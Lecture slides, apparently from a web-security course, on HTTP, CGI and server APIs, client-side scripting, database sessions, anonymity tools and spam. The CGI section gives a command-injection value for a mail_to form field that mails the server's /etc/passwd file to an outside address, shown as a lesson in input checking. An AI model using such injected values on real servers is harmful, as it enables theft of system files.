world wide web technology

World Wide Web Technology

• Request-response paradigm:

HTTP: HyperText Transfer Protocol

• HTTP is a typical TCP/IP protocol:

– Textual representation: both requests and responses have a textual representation so that a human can diagnose the protocol.

– Standard error codes: Internet convention says:

1xx: command received and being processed

2xx: success

3xx: further action is needed

4xx: temporary error

5xx: permanent error

(HTTP has some slight deviations, see later)

HTTP Example

• HTTP 1.0 request:

GET /index.html HTTP/1.0
From: [email protected]
User-Agent: Mozilla 4.74...
Accept: text/plain
Accept: text/html

... other fields ...

< empty line marks end of request >

HTTP Example (cont.)

• HTTP 1.0 reply:

HTTP/1.0 200 OK
Date: Mon, 08 Aug 2000 20:48:51 GMT
Server: Apache/1.3.4
Last-Modified: Wed, 23 Sep 1999 ...
Content-Length: 3173
Accept-Ranges: bytes
Connection: close
Content-Type: text/html

< empty line >

< The content of the document follows>
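Because the protocol is textual, a reply like the one above can be taken apart with ordinary string operations. The following is a minimal sketch, not a complete HTTP parser; the function name `parse_http_message` and the shortened sample reply are illustrative assumptions.

```python
def parse_http_message(raw: str):
    """Split a textual HTTP message into start line, header fields, and body."""
    head, _, body = raw.partition("\r\n\r\n")   # the empty line ends the header
    lines = head.split("\r\n")
    start_line = lines[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")     # split at the first colon only
        headers.append((name.strip(), value.strip()))  # a list keeps repeated fields
    return start_line, headers, body


# Shortened, hypothetical reply in the same shape as the slide's example.
reply = (
    "HTTP/1.0 200 OK\r\n"
    "Server: Apache/1.3.4\r\n"
    "Content-Length: 13\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<p>Hello</p>\n"
)
start_line, headers, body = parse_http_message(reply)
version, code, reason = start_line.split(" ", 2)
```

A list of pairs is used instead of a dictionary because a field such as Accept may legitimately appear more than once.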

HTTP Response Codes

• 1xx: request received, processing continues. (Such a response is followed by another one.)

• 2xx: success, result depends on the code:

– 200: OK, result follows.

– 201: An entity was created as a result of the request.

• 3xx: further processing needed:

– 300: Multiple choices, client must select one.

– 301: Moved permanently.

– 302: Moved temporarily.

– 304: Not modified (since date given in request).

HTTP Response Codes (cont.)

• 4xx: client error:

– 400: Malformed request.

– 401: Unauthorized, authorization required.

– 402: Payment required (not yet supported).

– 403: Forbidden, authorization will not help.

– 404: Not found. (Resource temporarily or permanently unavailable.)

• 5xx: server error:

– 500: Internal server error (unexpected by server).

– 503: Service unavailable (due to overload, …)

see: RFC 2068

http://www.normos.org/ietf/rfc/rfc2068.txt
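Since the first digit of a response code determines its class, a client can react sensibly even to codes it does not know in detail. A small sketch of that idea follows; the names `STATUS_CLASSES` and `status_class` are illustrative, not part of any library.

```python
STATUS_CLASSES = {
    1: "informational",
    2: "success",
    3: "redirection",
    4: "client error",
    5: "server error",
}


def status_class(code: int) -> str:
    """Return the class of an HTTP status code based on its first digit."""
    if not 100 <= code <= 599:
        raise ValueError(f"not an HTTP status code: {code}")
    return STATUS_CLASSES[code // 100]
```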

HTTP Threats from result codes

• HTTP is very susceptible to “man in the middle” attacks. Examples:

– 200: Since HTTP uses cleartext, the content of a document can be subtly altered. (The Content-Length must be kept correct though!)

– 301: A browser can be fooled into loading from a different server, without the user knowing it.

– 401: A user can be “tricked” into giving his password. Basic authentication transmits the password without encryption. (The newer digest authentication transmits only a hash computed from the password, not the password itself.)
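To see why basic authentication offers no protection against eavesdropping, note that the credentials are only base64-encoded, which anyone can reverse. The sketch below uses hypothetical credentials and illustrative function names.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the request header a browser sends for basic authentication."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8")).decode("ascii")
    return f"Authorization: Basic {token}"


def sniff_basic_auth(header_line: str):
    """What an eavesdropper does: strip the prefix and base64-decode."""
    token = header_line.split("Basic ", 1)[1]
    username, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return username, password


line = basic_auth_header("alice", "s3cret")   # hypothetical credentials
recovered = sniff_basic_auth(line)
```

The password does not appear literally in the header, but no key is needed to recover it.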

HTTP Basics

• HTTP/1.0 uses a TCP/IP connection for each request.

– HTTP/1.0 wastes resources because opening and closing connections is expensive.

– Subsequent requests to the same server seem to form a session, but because they are separate TCP/IP connections the (non-existent) session can easily be broken into.

– Browsers (Netscape Navigator, Internet Explorer, ...) issue several requests in parallel to retrieve in-line images “faster”. This actually constitutes a denial of service attack.

HTTP Basics (cont.)

• HTTP/1.1 solves some 1.0 problems:

– Support for multi-part content, meaning that only one request is needed to retrieve several objects at once.

– Persistent connections reduce the risk of break-ins into a session, and reduce connection setup overhead. (Persistent connections may also cause a server to need many more open connections.)

– Authentication can be done through a “challenge” mechanism and “digest authentication”. A user password is not transmitted over the network.
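The challenge mechanism can be sketched as follows: the server sends a fresh nonce, and the client answers with a hash over the credentials, the nonce, and the request. This is a minimal sketch of the basic digest computation without the later quality-of-protection extensions; all argument values used with it are hypothetical.

```python
import hashlib


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """Compute the response a client returns for a server-supplied nonce."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")   # secret part
    ha2 = md5_hex(f"{method}:{uri}")                  # request part
    return md5_hex(f"{ha1}:{nonce}:{ha2}")            # bound to this challenge


# Hypothetical values; a new nonce yields a different response.
r1 = digest_response("alice", "db", "s3cret", "GET", "/orders", "nonce-1")
r2 = digest_response("alice", "db", "s3cret", "GET", "/orders", "nonce-2")
```

Only the hash travels over the network, and because it depends on the nonce a captured response cannot simply be replayed against a new challenge.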

HTTP Security Issues

• HTTP allows content-coding. Unfortunately, only compression schemes are defined, and no encryption schemes.

• Secure-HTTP (or S-HTTP) is an extension with encryption, but not well supported. It encrypts the message (and reply) body but some of the header info is not encrypted.

• HTTPS (HTTP over SSL) first creates an encrypted channel (using SSL). Subsequently request and reply headers and body are encrypted.

HTTP Security Issues (cont.)

• Experimental implementations of persistent connections in HTTP 1.0 cause denial of service. Therefore HTTP 1.1 proxy servers never open a persistent connection with an HTTP 1.0 client.

• HTTP 1.1 connections may time out. Both clients and servers must always be able to recover from asynchronous close events.

• Browsers can route requests through a proxy. Some Internet Providers use a transparent proxy: the user may not be aware of the proxy’s existence.

HTTP Security Issues (cont.)

• Safe methods: GET and HEAD should not take an action other than retrieval. (Users cannot be held accountable for side effects of these methods.)

• Forms which are used with the GET method should never ask for sensitive information, because of logging attacks.

• The Content-MD5 header can be used to add a digest (checksum) to a reply. This gives the false impression that the message has not been tampered with: an attacker who alters the body can simply recompute the digest.
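The weakness of an unkeyed checksum is easy to demonstrate. The sketch below computes a Content-MD5 value (the base64 encoding of the MD5 digest of the body) and shows that a tampered body passes verification once the digest is recomputed; the sample bodies and function names are illustrative.

```python
import base64
import hashlib


def content_md5(body: bytes) -> str:
    """Base64 of the 128-bit MD5 digest of the body, as carried in Content-MD5."""
    return base64.b64encode(hashlib.md5(body).digest()).decode("ascii")


def verify(body: bytes, header_value: str) -> bool:
    return content_md5(body) == header_value


original = b"Pay 10 euro to Bob"
tampered = b"Pay 99 euro to Eve"

honest_header = content_md5(original)
forged_header = content_md5(tampered)   # the attacker needs no secret to do this
```

The header detects accidental corruption, but anyone able to change the body can change the header as well.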

HTTP Security Issues (cont.)

• The behavior of a cache with authorized requests is not always safe: a cache may return replies to non-authenticated clients.

• Sharing browser sessions on shared workstations poses the risk of authorized sessions to be taken over by the next user.

• A server may attempt to validate the identity of the user through the RFC 931 protocol. The user’s machine confirms the user name of an open connection. This technique is generally unsafe.

http://www.normos.org/ietf/rfc/rfc931.txt

Server-side Technology

• Basic architecture: CGI scripts act as a gateway between WWW server and information system (database system).

Server-side Technology (cont.)

• Security threats from CGI-scripts:

– The input for a CGI-script results from filling out a form. The script should anticipate erroneous input, possibly also data overrun.

– A CGI-script should check that it is invoked through the right form, by checking the HTTP_REFERER field. However, this field can be faked.

– CGI-scripts are often written in scripting languages such as Perl or Bourne-shell. Writing scripts in such languages is easy, but writing secure scripts is difficult.

Server-side Technology (cont.)

• Example (part of) insecure shell script:

echo $message | sendmail $mail_to

(message and mail_to are form fields)

if the user enters into the mail_to field:

[email protected];mail [email protected]</etc/passwd

this results in the password file being sent to [email protected]

Moral: do not use environment variables (that are set through forms) without quoting and without checking them.
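One way to follow this advice is to validate the form field against a strict pattern and then start the mail program with an argument list, so that no shell ever interprets the input. The sketch below is written in Python rather than Bourne-shell; the pattern is deliberately narrower than real address syntax, and the names `ADDRESS_RE` and `sendmail_argv` are assumptions for illustration.

```python
import re

# Deliberately strict pattern for illustration; real address syntax is broader.
# The first character must be alphanumeric, so the value can never look like an option.
ADDRESS_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def sendmail_argv(mail_to: str) -> list:
    """Validate the form field and return an argument vector (no shell involved)."""
    if not ADDRESS_RE.fullmatch(mail_to):
        raise ValueError("rejected mail_to field")
    return ["sendmail", mail_to]
```

The resulting list could then be handed to `subprocess.run(argv, input=message, text=True)`. Because the arguments are passed as a list and not as a command string, characters such as `;` and `<` have no special meaning even if validation were to miss them.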

Server-side Technology (cont.)

• CGI-scripts can also be abused for denial of service attacks:

– An HTTP POST (or PUT) request can contain an arbitrary amount of input data. This may cause several problems:

• Intermediate proxies may crash.

• The CGI-script may crash.

• The CGI-script may need a lot of memory to handle the request.

– A Web-server can be bombarded with (small) requests for CGI-scripts. The overhead can easily overload the Web-server.
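A script can defend itself against oversized input by checking the declared Content-Length against a limit before reading anything. The following is a sketch under assumed names (`MAX_BODY`, `BodyTooLarge`, `read_body`) and an arbitrary limit of 64 KB.

```python
import io

MAX_BODY = 64 * 1024   # assumed limit; tune per application


class BodyTooLarge(Exception):
    pass


def read_body(stream, content_length: int, limit: int = MAX_BODY) -> bytes:
    """Read the request body, refusing requests that declare too much data."""
    if content_length < 0:
        raise ValueError("negative Content-Length")
    if content_length > limit:
        raise BodyTooLarge(f"declared length {content_length} exceeds {limit}")
    data = stream.read(content_length)   # never read more than was declared
    if len(data) != content_length:
        raise ValueError("body shorter than declared Content-Length")
    return data


# In a CGI-script the stream would be standard input; BytesIO stands in for it here.
form_data = read_body(io.BytesIO(b"a=1&b=2"), 7)
```

This bounds memory use per request. It does not help against the second threat, a flood of small requests, which has to be handled by the server itself.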

Server-side Technology (cont.)

• Netscape: NSAPI

– While handling a request, the server can call user-added code at different stages: Init, AuthTrans, NameTrans, PathCheck, ObjectType, Service, Error and AddLog.

– Errors in the user-added functions may cause the server to crash.

http://developer.netscape.com/docs/manuals/enterprise/nsapi/index.htm

• Netscape: WAI (Web Application Interface)

– Newer API to write application “wrappers”, again through a server plug-in.







Server-side Technology (cont.)

• Microsoft IIS: ISAPI

– Similar to NSAPI, with the same problem: code added to the server may cause the server to crash.

• Microsoft IIS: ASP (Active Server Pages)

– Server-side scripting, in VBscript or Jscript, to create dynamic Web content and connections with databases. (Uses an ISAPI plugin itself.)

• Microsoft IIS: IDC (Internet Database Connector)

– “Extended” HTML written in .htx files

– Database scripts written in .idc files (easy to create through Frontpage editor)

Server-side Technology (cont.)

• Servlets: Java “equivalent” to NSAPI or ISAPI:

– User-written code is added to the (running) server.

– The Java environment ensures that errors in the code cannot cause a server crash.

– The servlet API includes facilities for maintaining session information.

– Servlets are a server-independent technology. Many Web-servers support Java servlets.

Client-side Technology

• Apart from displaying HTML pages, a modern Web-browser can perform many other tasks:

– Invoking external programs;

– User-interaction through forms;

– Preserving state using cookies;

– Executing scripting code;

– Extension of browser with plug-ins;

– Execution of Java applets (plain or signed);

– Execution of ActiveX controls (Windows only).

Client-side Technology (cont.)

• Invoking external programs:

– The HTTP reply contains a MIME-type; depending on the MIME-type the browser will:

• Display the information (e.g. for HTML, GIF, JPG).

• Use a plug-in to handle the information (see later).

• Invoke an external program to handle the information.

– The external program must already be installed on the client machine.

– The user defines which MIME-type corresponds to which program.

– The user must be careful to not allow information to be stolen or overwritten (un)intentionally.

Client-side Technology (cont.)

• User-interaction through forms:

– Many Web-sites offer seemingly interesting information only after the user fills out a form, which sends potentially sensitive information about the user to the Web-site.

– Form input is sent to the server as cleartext. The browser can warn the user about it, but most users disable the warnings.

– Modern browsers support form-based file upload. Users can be tricked to upload files with sensitive data.

– Beware of forms combined with scripting.

Client-side Technology (cont.)

• Preserving state info through Cookies:

– A server orders a browser to store info using a Set-Cookie field in an HTTP reply. (One reply may contain several Set-Cookie requests.)

– The browser returns cookies using the Cookie field in an HTTP request.

– Cookies (with valid associated path names) are shared between servers that share part of the domain name: 2 periods for .com, .edu, etc. and 3 periods for .us, .nl, .uk, .be, etc.

– Cookies are limited to 4Kbyte each, 20 Cookies per domain, 300 Cookies total.

http://www.netscape.com/newsref/std/cookie_spec.html
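The period-counting rule for cookie domains can be written down in a few lines. This sketch assumes that the two-period group consists of the seven generic top-level domains named in the Netscape specification (the slide lists only .com and .edu explicitly); the function name is illustrative.

```python
# Assumed list of top-level domains for which two periods suffice.
SPECIAL_TLDS = {"com", "edu", "net", "org", "gov", "mil", "int"}


def domain_attribute_allowed(domain: str) -> bool:
    """Apply the period-counting rule to a cookie's domain attribute."""
    tld = domain.rsplit(".", 1)[-1].lower()
    required = 2 if tld in SPECIAL_TLDS else 3
    return domain.count(".") >= required
```

Under this rule `.acme.com` is acceptable, while `.co.uk` is rejected, so one site cannot set a cookie that is sent to every server under a shared country-level suffix.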






Client-side Technology (cont.)

• Javascript and VBscript:

– Scripting languages (Javascript from Netscape and VBscript from Microsoft) make Web-pages active and/or interactive.

– Actions can be triggered by user input (like button clicks, filling out a text field, etc.), by window operations (like close) and by time-outs.

– Scripting languages can be abused to:

• Render the user’s workstation useless.

• Lure the user into typing in or uploading sensitive information.

• Lure users to the “wrong” Web-sites.

Client-side Technology (cont.)

• Denial of service attacks using scripting:

– Scripting languages are interpreted, which means execution is slow. A long (or infinite) loop may consume a large percentage of the available cpu-time.

– A simple script may loop through a large array, thus consuming a lot of memory and hence resulting in thrashing.

– A script may create extra windows upon being (un)loaded. It may re-open the window each time it is minimized or closed. A script may make it very difficult to get rid of such a window.

Client-side Technology (cont.)

• Obtaining sensitive information through scripts:

– There are numerous ways to lure users into typing in what one wants them to type using forms alone.

– Scripting adds the possibility to open a popup window prompting for information.

– A script can also make suggestions in the message area (bottom of browser window).

– A script can change a file upload field before doing the upload.

Client-side Technology (cont.)

• Danger of powerful scripting language: unrestricted simultaneous access to local resources and the network:

– A (VB)script can read, write, create and delete arbitrary files (for which the user has access rights).

– A script can perform complicated calculations and manipulations because it is a general-purpose programming language.

– The “mail-part” of Internet Explorer can be configured to automatically invoke scripts without requiring a “click”.

Client-side Technology (cont.)

• Tricking the clicks:

– A browser normally displays the destination of a link in the message area. A script can write a message by handling the mouseover event. This message may suggest a different link destination.

– Some sites are paid for through advertisements. Some advertisers want to see hits on their site. Scripts can be used to “simulate” (but really generate) hits to sites without the user actually clicking on anything.

Client-side Technology (cont.)

• Extending the browser with plug-ins:

– Plug-ins are modules in machine code that are “intended” for enabling a browser to display some media type in-line.

– A plug-in must be installed by the user on the client machine. Users should be very suspicious about plug-ins but most users are not.

– A plug-in can perform all operations a separate executable can, including uploading arbitrary files, installing viruses, modifying or deleting arbitrary files, crashing the browser, maybe even rebooting the operating system, etc.

Client-side Technology (cont.)

• Java applets: safe interactive components?

Java applets are executed within a “shielded” environment (called sandbox):

– Applets cannot read or write files.

– Applets can only open IP connections to their origin site.

– The Java runtime environment can perform a limited integrity check on applets.

– When an applet performs an illegal operation the Java runtime environment catches it and generates an appropriate error message.

Client-side Technology (cont.)

• Java applets: safe interactive components?

– Applets can call methods of other applets that are included in the same HTML file. (They cannot find out about applets in other files.)

– Applets in different frames (or files) can communicate through static fields.

– Applets are stopped when the enclosing Web-page is being unloaded (replaced by a new page).

– Stopped applets (not on displayed pages) may be destroyed and garbage collected.

– Resource consumption by active applets may render the user’s workstation unusable.

Client-side Technology (cont.)

• ActiveX: Distributed Components

– ActiveX uses code signing. The supplier of an ActiveX control must provide a certificate (obtained from a trusted third party).

– The browser displays an authenticode dialog box asking the user to accept the ActiveX control.

– An accepted ActiveX control is a machine code module downloaded from a remote site. It can perform all actions that a separate program can execute (uploading, crashing, formatting hard disk, etc.)

See also: http://www.byte.com/art/9709/sec5/sec5.htm

Database Sessions on the Web

• Database transactions consist of several steps. When accessing a database through the Web each step takes a separate HTTP request.

– The requests need to be tied to the appropriate session (or transaction).

– The session must not be broken into (even though each request is separate).

– The system needs to be able to handle long-lived transactions but also be able to timeout when a session is inactive for a long time.

Database Sessions on the Web (cont.)

• Logging on to a Database through WWW:

– Logging on can be done through a form that asks for a username and password. The password will not be encrypted in the request.

– The server can return a code 401 on the first database request. The browser will prompt for a username and password. With basic authentication the password is sent unencrypted. With digest authentication only a hash computed from the password is sent, not the password itself.

– The browser will authenticate each subsequent request. The user must be sure to exit the browser after completing the database session.

Database Sessions on the Web (cont.)

• Once a session is created the browser must be able to refer to it in each request.

– The session id can be kept in a hidden field in the form on each page.

– The session id can be passed as part of the URL of each page.

– The session id can be passed through Cookies. (Cookies are set through an HTTP reply and are stored on the client computer. They are sent back by the client on each subsequent request.)
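Whichever of the three transport mechanisms is used, the server side needs a table that maps session ids to state, with ids that cannot be guessed and an idle timeout. The class below is a minimal in-memory sketch; the name `SessionStore`, the 15-minute default, and the injectable clock are assumptions made for illustration.

```python
import secrets
import time


class SessionStore:
    """In-memory session table keyed by an unguessable id, with idle timeout."""

    def __init__(self, idle_timeout: float = 900.0, clock=time.monotonic):
        self._idle_timeout = idle_timeout
        self._clock = clock
        self._sessions = {}   # session id -> (last access time, data)

    def create(self) -> str:
        sid = secrets.token_urlsafe(32)   # random, so ids cannot be guessed
        self._sessions[sid] = (self._clock(), {})
        return sid

    def lookup(self, sid: str):
        """Return the session data, or None if unknown or timed out."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        last_access, data = entry
        now = self._clock()
        if now - last_access > self._idle_timeout:
            del self._sessions[sid]       # inactive for too long: drop it
            return None
        self._sessions[sid] = (now, data)
        return data
```

The returned id is what would be placed in the hidden field, the URL, or the cookie. A random id makes it hard to break into someone else's session by guessing, but it does not protect the id from being read off the network.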

Database Sessions on the Web (cont.)

• Dealing with long-lived transactions:

– When most transactions wish to succeed (e.g. customers want to buy items) one should use pessimistic concurrency control. Items are locked while they are in the customer’s shopping cart.

– When most transactions are deliberately aborted (e.g. customers put back items or leave the store, leaving their cart behind) one should use optimistic concurrency control. Items are not locked while in the customer’s shopping cart and may not be available at the cash register.
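The difference between the two strategies can be sketched with a toy inventory. In the pessimistic variant an item is reserved the moment it enters a cart; in the optimistic variant availability is only checked at the cash register. All class and method names are illustrative, and a real system would use database locks or version checks instead of a Python dictionary.

```python
class OutOfStock(Exception):
    pass


class Inventory:
    def __init__(self, stock):
        self.stock = dict(stock)          # item -> units available

    # Pessimistic: reserve (lock) the unit when it enters the cart.
    def add_to_cart_pessimistic(self, cart, item):
        if self.stock.get(item, 0) < 1:
            raise OutOfStock(item)
        self.stock[item] -= 1
        cart.append(item)

    def abandon_cart_pessimistic(self, cart):
        for item in cart:
            self.stock[item] += 1         # release the reservations
        cart.clear()

    # Optimistic: the cart is only a wish list; stock is checked at checkout.
    def add_to_cart_optimistic(self, cart, item):
        cart.append(item)

    def checkout_optimistic(self, cart):
        needed = {}
        for item in cart:
            needed[item] = needed.get(item, 0) + 1
        for item, count in needed.items():
            if self.stock.get(item, 0) < count:
                raise OutOfStock(item)    # conflict detected late: abort
        for item, count in needed.items():
            self.stock[item] -= count
        cart.clear()
```

With pessimistic control an abandoned cart blocks other customers until it is released (for example by a session timeout); with optimistic control nobody is blocked, but a customer may be disappointed at checkout.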

Database Connections through Java

• Java applets can be used to keep a connection to a database (or gateway) open.

– JDBC-ODBC bridge: works with many database systems.

– Native-API partly-Java driver: requires specific client API (for Oracle, Sybase, …)

– Net-protocol All-Java driver: protocol between browser and server is vendor independent.

– Native-protocol All-Java driver: converts JDBC calls to network protocol for specific DBMS. There are 2-tier and 3-tier configurations.

Database Connections through Java (cont.)

[Figure: JDBC-ODBC bridge]

[Figure: Native-API partly-Java driver]

[Figure: Net-protocol All-Java driver]

[Figure: Native-protocol All-Java driver, 2-tier]

[Figure: Native-protocol All-Java driver, 3-tier]

Privacy on the Web

• The Web is not as anonymous as it looks:

– The user’s IP number, browser, operating system and other aspects may be detected. Cookies may provide additional information about the user.

– Different Web-sites may collaborate in gathering data about users by combining their logging activities.

– ISPs may log Web access distribution and provide access patterns and hit rates to Web-sites.

– Users may sometimes want to be known (e.g. to buy and pay something) and sometimes want to be anonymous.

Privacy on the Web (cont.)

• The Anonymizer:

– Functions as a kind of proxy server.

– Accesses appear to originate from the anonymizer site instead of the user’s IP number.

– All user-related data is removed from a request.

– Users are not anonymous to the anonymizer. (And the anonymizer may be legally forced to reveal a user’s accesses.)

– Users are not anonymous to their ISP either.

See http://www.anonymizer.com/



Privacy on the Web (cont.)

• Crowds: anonymously hiding in a crowd.

– Each user activates a jondo; jondos communicate with each other.

– Each HTTP request is forwarded to another randomly chosen jondo.

– Each received request is either forwarded to another jondo or passed on to the destination server.

– The random routing is very safe (not traceable, and no single point of failure) but may be slow.

– Crowds cannot really include members that are behind firewalls.
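The random routing can be simulated in a few lines. The sketch assumes that each jondo decides by a biased coin flip whether to forward again; the forwarding probability `p_forward` is a parameter introduced here for illustration and is not given in the slides.

```python
import random


def crowds_path(jondos, initiator, p_forward, rng):
    """Return the list of jondos a request visits before reaching the server."""
    path = [initiator]
    current = rng.choice(jondos)        # the first hop always goes to a random jondo
    path.append(current)
    while rng.random() < p_forward:     # biased coin flip at every jondo
        current = rng.choice(jondos)    # forward to another randomly chosen jondo
        path.append(current)
    return path                         # the last jondo contacts the server


rng = random.Random(2000)               # fixed seed, only to make runs repeatable
path = crowds_path(["j1", "j2", "j3", "j4"], "j1", 0.75, rng)
```

The destination server sees only the last jondo on the path, and every jondo on the path knows only its predecessor, which may or may not be the initiator. A higher forwarding probability gives longer paths, which explains why the scheme may be slow.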

Privacy on the Web (cont.)

• Onion Routing: anonymity through encrypted messages and routing through a network of “Mixes”.

– An onion (on the client machine) determines a path through the network. It uses a recursively layered data structure using keys of all routers on the path.

– Each router can decrypt the onion to find out the address of the next router (but not the message or the rest of the path).

– There is no single point of failure.
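The layered structure can be illustrated with a toy implementation. Note the assumptions: the cipher below is a simple XOR keystream that is NOT secure and merely stands in for real encryption, each router is given a shared secret key where a real system would use the routers' public keys, and all names are hypothetical.

```python
import base64
import hashlib
import json


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy cipher: XOR with a SHA-256 counter keystream. NOT secure; illustration only."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        chunk = data[offset:offset + 32]
        out.extend(b ^ k for b, k in zip(chunk, block))
    return bytes(out)


def build_onion(path, keys, destination, message: bytes) -> bytes:
    """Wrap the message in one layer per router, innermost layer first."""
    next_hop, payload = destination, message
    for router in reversed(path):
        layer = json.dumps({
            "next": next_hop,
            "data": base64.b64encode(payload).decode("ascii"),
        }).encode("utf-8")
        payload = _keystream_xor(keys[router], layer)   # only this router can open it
        next_hop = router
    return payload


def peel(key: bytes, onion: bytes):
    """What one router does: remove its own layer, learn only the next hop."""
    layer = json.loads(_keystream_xor(key, onion).decode("utf-8"))
    return layer["next"], base64.b64decode(layer["data"])


keys = {"r1": b"key-one", "r2": b"key-two", "r3": b"key-three"}   # hypothetical keys
onion = build_onion(["r1", "r2", "r3"], keys, "server.example", b"GET /")
```

Each call to `peel` reveals the next hop and an inner blob that is still encrypted for the following router, so no router except the last sees the message and none sees the whole path.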

Privacy on the Web (cont.)

• LPWA: Lucent Personalized Web Assistant

– Acts as a proxy server.

– Creates a different alias for a user for each Web-site. (So collaborating Web-sites cannot detect a common user.)

– Creates a different alias email address for each Web-site; the address is fake but nevertheless works.

– Includes anti-spamming support by letting the user block certain alias email addresses (to which spam is being sent).

– Has a single point of failure.

Anonymous E-mail (or Netnews)

• Pseudo-anonymous remailers:

– The user registers with a remailer. The remailer creates an alias (email address on his site). Mail from the user is forwarded as if it came from the alias. Mail to the alias is forwarded back to the user.

– Mail is delayed for a random period of time, so that there is no correlation between the time mail arrives at the remailer and the time it leaves the remailer.

– A trustworthy remailer will support PGP.

Anonymous E-mail (or Netnews) (cont.)

• True anonymous remailers:

– Cypherpunk remailers:

• Messages are encrypted recursively several times.

• Each remailer strips off one layer.

– Mixmaster remailers:

• Messages contain 20 encrypted headers.

• Each remailer adds its header to the back of the list, so the number of headers remains 20. (No remailer knows how many hops there are before or after itself, except for the last one, which knows it must perform delivery.)

Nice intro to Cypherpunk and Mixmaster at: http://www.obscura.com/~loki/remailer/remailer-essay.html









SPAM

• SPAM is a collection of forms of email abuse, including:

– Trying to sell you something you don’t want.

– Pyramid scams.

– Chain letters.

– Junk mail faked to look like it accidentally got to you but was for someone else.

– Requests for permission to send you commercial email.

– Unwanted announcements of events.

SPAM (cont.)

• How to recognize SPAM?

– Subject or content often speaks for itself.

– Sender is a numbered/free email account.

– Message asks to reply if you wish to no longer receive mail from this sender or list.

– Sender looks like a fake address.

– Sender looks like a real address but clearly an address from where this kind of message would not have been sent.

SPAM (cont.)

• Why do you receive SPAM?

– There are “robots” or “spiders” searching for email addresses on Web-sites, Netnews postings, mailing list archives, message boards.

– Organizations sell databases with millions of email addresses they gathered. (They use SPAM to advertise their databases…)

– If you have never announced your email address anywhere, someone else may have done it, e.g. to tell people in a newsgroup that you are knowledgeable in some subject area.

SPAM (cont.)

• How to avoid SPAM?

– The chances of completely avoiding SPAM are small when you use the Web, Netnews, etc.

– Never write your email address.

– Transform your email address in a way which is obvious enough for humans but too difficult for mail-address-searching robots. (e.g. use [email protected])

– Do not explain how to obtain your email address from the distorted one.

– Never reply to a SPAM message!

SPAM (cont.)

• How to filter out SPAM?

– Block mail from sites which are “known” for spamming (some “free email” sites are often blocked, including hotmail.com, freemail.nl).

– Block mail from usernames with numbers in them.

– Delete mail with a combination of certain words or expressions in them (like “get rich” or “make * $ in * days”).

– Verify that the sender’s domain exists.
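The first three filtering rules can be combined into a simple heuristic. The sketch below takes the blocked domains and phrases from the examples above, renders the `*` wildcard as `.*` in a regular expression, and leaves out the domain-existence check because that needs a DNS lookup. The function name is illustrative, and such rules will inevitably reject some legitimate mail.

```python
import re

BLOCKED_DOMAINS = {"hotmail.com", "freemail.nl"}   # the examples named above
# "*" in the patterns above is rendered as ".*" in a regular expression.
PHRASES = [
    re.compile(r"get rich", re.IGNORECASE),
    re.compile(r"make .* \$ in .* days", re.IGNORECASE),
]


def looks_like_spam(sender: str, text: str) -> bool:
    """Apply the domain, numbered-username, and phrase rules in turn."""
    user, _, domain = sender.rpartition("@")
    if domain.lower() in BLOCKED_DOMAINS:
        return True
    if any(ch.isdigit() for ch in user):
        return True
    return any(pattern.search(text) for pattern in PHRASES)
```

Since sender addresses are usually faked, the phrase rule tends to be the most reliable of the three.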

SPAM (cont.)

• What to do and what not to do:

– Do not send an email bomb to the sender, because in 99% of the cases the sender address was faked.

– Send a friendly message to the “postmaster” or “abuse” of the sender’s site, to warn him that the site’s name is being abused. (Do not assume the site is the origin of the SPAM.)

– Notify your ISP, who may try to trace back the real origin of the message.

– If the message announces dubious services with phone numbers, notify the phone company.
